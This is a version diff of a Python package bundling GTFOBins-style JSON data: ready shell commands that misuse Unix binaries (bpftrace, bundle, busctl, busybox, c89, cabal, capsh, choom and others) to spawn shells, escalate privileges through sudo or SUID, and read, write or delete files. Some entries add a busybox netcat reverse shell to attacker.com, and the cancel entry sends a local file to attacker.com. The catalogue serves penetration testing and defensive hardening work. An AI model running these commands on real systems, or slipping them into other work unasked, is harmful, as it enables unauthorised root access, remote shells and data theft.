gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/bpftrace.json

@@ -2,14 +2,17 @@
   "functions": {
     "sudo": [
       {
-        "code": "sudo bpftrace -e 'BEGIN {system(\"/bin/sh\");exit()}'"
+        
+        "code": "sudo bpftrace -e 'BEGIN {system(\"/bin/sh\");exit()}'\n"
       },
       {
+        
         "code": "TF=$(mktemp)\necho 'BEGIN {system(\"/bin/sh\");exit()}' >$TF\nsudo bpftrace $TF\n"
       },
       {
-        "code": "sudo bpftrace -c /bin/sh -e 'END {exit()}'"
+        
+        "code": "sudo bpftrace -c /bin/sh -e 'END {exit()}'\n"
       }
     ]
   }
-}
+}

gtfo/data/bridge.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nbridge -b \"$LFILE\"\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./bridge -b \"$LFILE\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo bridge -b \"$LFILE\"\n"
+      }
+    ]
+  }
+}

gtfo/data/bundle.json

@@ -0,0 +1,32 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This invokes the default pager, which is likely to be  [`less`](/gtfobins/less/), other functions may apply.",
+        "code": "bundle help\n!/bin/sh\n"
+      },
+      {
+        
+        "code": "export BUNDLE_GEMFILE=x\nbundle exec /bin/sh\n"
+      },
+      {
+        
+        "code": "TF=$(mktemp -d)\ntouch $TF/Gemfile\ncd $TF\nbundle exec /bin/sh\n"
+      },
+      {
+        "description": "This spawns an interactive shell via [`irb`](/gtfobins/irb/).",
+        "code": "TF=$(mktemp -d)\ntouch $TF/Gemfile\ncd $TF\nbundle console\nsystem('/bin/sh -c /bin/sh')\n"
+      },
+      {
+        
+        "code": "TF=$(mktemp -d)\necho 'system(\"/bin/sh\")' > $TF/Gemfile\ncd $TF\nbundle install\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This invokes the default pager, which is likely to be  [`less`](/gtfobins/less/), other functions may apply.",
+        "code": "sudo bundle help\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/bundler.json

@@ -2,28 +2,31 @@
   "functions": {
     "shell": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be  [`less`](/gtfobins/less/), other functions may apply.",
         "code": "bundler help\n!/bin/sh\n"
       },
       {
+        
         "code": "export BUNDLE_GEMFILE=x\nbundler exec /bin/sh\n"
       },
       {
+        
         "code": "TF=$(mktemp -d)\ntouch $TF/Gemfile\ncd $TF\nbundler exec /bin/sh\n"
       },
       {
-        "description": "This spawns an interactive shell via 'irb'.",
+        "description": "This spawns an interactive shell via [`irb`](/gtfobins/irb/).",
         "code": "TF=$(mktemp -d)\ntouch $TF/Gemfile\ncd $TF\nbundler console\nsystem('/bin/sh -c /bin/sh')\n"
       },
       {
+        
         "code": "TF=$(mktemp -d)\necho 'system(\"/bin/sh\")' > $TF/Gemfile\ncd $TF\nbundler install\n"
       }
     ],
     "sudo": [
       {
-        "description": "This invokes the default pager, which is likely to be  'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be  [`less`](/gtfobins/less/), other functions may apply.",
         "code": "sudo bundler help\n!/bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/busctl.json

@@ -1,15 +1,26 @@
 {
-  "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
   "functions": {
     "shell": [
       {
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "busctl --show-machine\n!/bin/sh\n"
+      },
+      {
+        
+        "code": "busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo busctl --show-machine\n!/bin/sh\n"
+        
+        "code": "sudo busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./busctl --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'\n"
       }
     ]
   }
-}
+}

gtfo/data/busybox.json

@@ -1,37 +1,46 @@
 {
-  "description": "BusyBox may contain many UNIX utilities, run 'busybox --list-full' to check what GTFBins binaries are supported. Here some example.",
   "functions": {
     "shell": [
       {
-        "code": "busybox sh"
+        
+        "code": "busybox sh\n"
       }
     ],
     "file-upload": [
       {
         "description": "Serve files in the local folder running an HTTP server.",
-        "code": "busybox httpd -f -p [port] -h .\n"
+        "code": "LPORT=12345\nbusybox httpd -f -p $LPORT -h .\n"
       }
     ],
     "file-write": [
       {
-        "code": "busybox sh -c 'echo \"DATA\" > [file]'\n"
+        
+        "code": "LFILE=file_to_write\nbusybox sh -c 'echo \"DATA\" > $LFILE'\n"
       }
     ],
     "file-read": [
       {
-        "code": "./busybox cat [file]\n"
+        
+        "code": "LFILE=file_to_read\n./busybox cat \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
         "description": "It may drop the SUID privileges depending on the compilation flags and the runtime configuration.",
-        "code": "./busybox sh"
+        "code": "./busybox sh\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo busybox sh"
+        
+        "code": "sudo busybox sh\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run `nc -lvp 12345` on the attacker box to receive the shell.",
+        "code": "RHOST=attacker.com\nRPORT=12345\nbusybox nc -e /bin/sh $RHOST $RPORT\n"
       }
     ]
   }
-}
+}

gtfo/data/byebug.json

@@ -2,18 +2,21 @@
   "functions": {
     "shell": [
       {
+        
         "code": "TF=$(mktemp)\necho 'system(\"/bin/sh\")' > $TF\nbyebug $TF\ncontinue\n"
       }
     ],
     "limited-suid": [
       {
+        
         "code": "TF=$(mktemp)\necho 'system(\"/bin/sh\")' > $TF\n./byebug $TF\ncontinue\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "TF=$(mktemp)\necho 'system(\"/bin/sh\")' > $TF\nsudo byebug $TF\ncontinue\n"
       }
     ]
   }
-}
+}

gtfo/data/bzip2.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nbzip2 -c $LFILE | bzip2 -d\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./bzip2 -c $LFILE | bzip2 -d\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo bzip2 -c $LFILE | bzip2 -d\n"
+      }
+    ]
+  }
+}

gtfo/data/c89.json

@@ -0,0 +1,28 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nc89 -x c -E \"$LFILE\"\n"
+      }
+    ],
+    "file-write": [
+      {
+        
+        "code": "LFILE=file_to_delete\nc89 -xc /dev/null -o $LFILE\n"
+      }
+    ],
+    "shell": [
+      {
+        
+        "code": "c89 -wrapper /bin/sh,-s .\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo c89 -wrapper /bin/sh,-s .\n"
+      }
+    ]
+  }
+}

gtfo/data/c99.json

@@ -0,0 +1,28 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nc99 -x c -E \"$LFILE\"\n"
+      }
+    ],
+    "file-write": [
+      {
+        
+        "code": "LFILE=file_to_delete\nc99 -xc /dev/null -o $LFILE\n"
+      }
+    ],
+    "shell": [
+      {
+        
+        "code": "c99 -wrapper /bin/sh,-s .\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo c99 -wrapper /bin/sh,-s .\n"
+      }
+    ]
+  }
+}

gtfo/data/cabal.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "cabal exec -- /bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./cabal exec -- /bin/sh -p\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo cabal exec -- /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/cancel.json

@@ -2,9 +2,9 @@
   "functions": {
     "file-upload": [
       {
-        "description": "Send local file using a TCP connection. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
-        "code": "cancel -u \"$(cat [file])\" -h [host]:[port]\n"
+        "description": "Send local file using a TCP connection. Run `nc -l -p 12345 > \"file_to_save\"` on the attacker box to collect the file.",
+        "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_to_send\ncancel -u \"$(cat $LFILE)\" -h $RHOST:$RPORT\n"
       }
     ]
   }
-}
+}

gtfo/data/capsh.json

@@ -2,17 +2,20 @@
   "functions": {
     "shell": [
       {
-        "code": "capsh --"
+        
+        "code": "capsh --\n"
       }
     ],
     "suid": [
       {
-        "code": "./capsh --gid=0 --uid=0 --"
+        
+        "code": "./capsh --gid=0 --uid=0 --\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo capsh --"
+        
+        "code": "sudo capsh --\n"
       }
     ]
   }

gtfo/data/cargo.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "inherit": [
+      {
+        "code": "cargo help doc",
+        "contexts": {
+          "sudo": null,
+          "unprivileged": null
+        },
+        "from": "less"
+      }
+    ]
+  }
+}

gtfo/data/cat.json

@@ -2,18 +2,21 @@
   "functions": {
     "file-read": [
       {
-        "code": "cat [file]\n"
+        
+        "code": "LFILE=file_to_read\ncat \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./cat [file]\n"
+        
+        "code": "LFILE=file_to_read\n./cat \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo cat [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo cat \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/cdist.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "cdist shell -s /bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo cdist shell -s /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/certbot.json

@@ -2,11 +2,13 @@
   "functions": {
     "shell": [
       {
+        
         "code": "TF=$(mktemp -d)\ncertbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir $TF --work-dir $TF --config-dir $TF --pre-hook '/bin/sh 1>&0 2>&0'\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "TF=$(mktemp -d)\nsudo certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir $TF --work-dir $TF --config-dir $TF --pre-hook '/bin/sh 1>&0 2>&0'\n"
       }
     ]

gtfo/data/chattr.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "privilege-escalation": [
+      {
+        "code": "chattr +i /path/to/input-file",
+        "comment": "Make the target file immutable.",
+        "contexts": {
+          "sudo": null,
+          "suid": null
+        }
+      }
+    ]
+  }
+}

gtfo/data/check_by_ssh.json

@@ -1,16 +1,15 @@
 {
-  "description": "This is the 'check_by_ssh' Nagios plugin, available e.g. in '/usr/lib/nagios/plugins/'.\n",
   "functions": {
     "shell": [
       {
         "description": "The shell will only last 10 seconds.",
-        "code": "check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C xx"
+        "code": "check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C xx\n"
       }
     ],
     "sudo": [
       {
         "description": "The shell will only last 10 seconds.",
-        "code": "sudo check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C xx"
+        "code": "sudo check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C xx\n"
       }
     ]
   }

gtfo/data/check_cups.json

@@ -1,14 +1,15 @@
 {
-  "description": "This is the 'check_cups' Nagios plugin, available e.g. in '/usr/lib/nagios/plugins/'. The read file content is limited to the first line.\n",
   "functions": {
     "file-read": [
       {
-        "code": "check_cups --extra-opts=@[file]\n"
+        
+        "code": "LFILE=file_to_read\ncheck_cups --extra-opts=@$LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo check_cups --extra-opts=@[file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo check_cups --extra-opts=@$LFILE\n"
       }
     ]
   }

gtfo/data/check_log.json

@@ -1,20 +1,22 @@
 {
-    "description": "This is the 'check_log' Nagios plugin, available e.g. in '/usr/lib/nagios/plugins/'.\n",
-    "functions": {
-      "file-read": [
-        {
-          "code": "check_log -F [file] -O [output]\ncat [output]\n"
-        }
-      ],
-      "file-write": [
-        {
-          "code": "check_log -F [input] -O [file]\n"
-        }
-      ],
-      "sudo": [
-        {
-          "code": "sudo check_log -F [input] -O [file]\n"
-        }
-      ]
-    }
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nOUTPUT=output_file\ncheck_log -F $LFILE -O $OUTPUT\ncat $OUTPUT\n"
+      }
+    ],
+    "file-write": [
+      {
+        
+        "code": "LFILE=file_to_write\nINPUT=input_file\ncheck_log -F $INPUT -O $LFILE\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_write\nINPUT=input_file\nsudo check_log -F $INPUT -O $LFILE\n"
+      }
+    ]
   }
+}

gtfo/data/check_memory.json

@@ -1,14 +1,15 @@
 {
-  "description": "This is the 'check_memory' Nagios plugin, available e.g. in '/usr/lib/nagios/plugins/'. The read file content is limited to the first line.\n",
   "functions": {
     "file-read": [
       {
-        "code": "check_memory --extra-opts=@[file]\n"
+        
+        "code": "LFILE=file_to_read\ncheck_memory --extra-opts=@$LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo check_memory --extra-opts=@[file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo check_memory --extra-opts=@$LFILE\n"
       }
     ]
   }

gtfo/data/check_raid.json

@@ -1,14 +1,15 @@
 {
-  "description": "This is the 'check_raid' Nagios plugin, available e.g. in '/usr/lib/nagios/plugins/'. The read file content is limited to the first line.\n",
   "functions": {
     "file-read": [
       {
-        "code": "check_raid --extra-opts=@[file]\n"
+        
+        "code": "LFILE=file_to_read\ncheck_raid --extra-opts=@$LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo check_raid --extra-opts=@[file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo check_raid --extra-opts=@$LFILE\n"
       }
     ]
   }

gtfo/data/check_ssl_cert.json

@@ -1,16 +1,15 @@
 {
-  "description": "This is the 'check_by_ssh' Nagios plugin, available e.g. in '/usr/lib/nagios/plugins/'.\n",
   "functions": {
     "command": [
       {
         "description": "The host example.net must return a certificate via TLS",
-        "code": "TF=$(mktemp)\necho \"[command] | tee [file]\" > $TF\nchmod +x $TF\ncheck_ssl_cert --curl-bin $TF -H example.net\ncat [file]\n"
+        "code": "COMMAND=id\nOUTPUT=output_file\nTF=$(mktemp)\necho \"$COMMAND | tee $OUTPUT\" > $TF\nchmod +x $TF\ncheck_ssl_cert --curl-bin $TF -H example.net\ncat $OUTPUT\n"
       }
     ],
     "sudo": [
       {
         "description": "The host example.net must return a certificate via TLS",
-        "code": "TF=$(mktemp)\necho \"[command] | tee [file]\" > $TF\nchmod +x $TF\numask 022\ncheck_ssl_cert --curl-bin $TF -H example.net\ncat [file]\n"
+        "code": "COMMAND=id\nOUTPUT=output_file\nTF=$(mktemp)\necho \"$COMMAND | tee $OUTPUT\" > $TF\nchmod +x $TF\numask 022\ncheck_ssl_cert --curl-bin $TF -H example.net\ncat $OUTPUT\n"
       }
     ]
   }

gtfo/data/check_statusfile.json

@@ -1,14 +1,15 @@
 {
-  "description": "This is the 'check_statusfile' Nagios plugi plugin, available e.g. in '/usr/lib/nagios/plugins/'. The read file content is limited to the first line.\n",
   "functions": {
     "file-read": [
       {
-        "code": "check_statusfile [file]\n"
+        
+        "code": "LFILE=file_to_read\ncheck_statusfile $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo check_statusfile [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo check_statusfile $LFILE\n"
       }
     ]
   }

gtfo/data/chmod.json

@@ -1,14 +1,15 @@
 {
-  "description": "This can be run with elevated privileges to change permissions ('6' denotes the SUID bits) and then read, write, or execute a file.",
   "functions": {
     "suid": [
       {
-        "code": "./chmod 6777 [file]\n"
+        
+        "code": "LFILE=file_to_change\n./chmod 6777 $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo chmod 6777 [file]\n"
+        
+        "code": "LFILE=file_to_change\nsudo chmod 6777 $LFILE\n"
       }
     ]
   }

gtfo/data/choom.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "choom -n 0 /bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./choom -n 0 -- /bin/sh -p\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo choom -n 0 /bin/sh\n"
+      }
+    ]
+  }
+}